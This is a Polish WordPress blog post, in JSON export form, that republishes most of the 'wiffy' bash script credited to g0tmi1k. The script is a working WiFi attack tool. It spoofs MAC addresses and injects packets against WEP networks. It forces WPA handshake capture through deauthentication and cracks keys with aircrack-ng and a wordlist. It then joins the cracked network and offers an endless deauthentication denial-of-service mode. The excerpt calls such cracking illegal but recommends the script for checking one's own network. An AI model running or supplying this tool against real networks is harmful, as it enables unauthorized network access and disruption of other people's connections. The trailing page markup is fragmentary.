v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/akwarium\/akwarium0004.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n 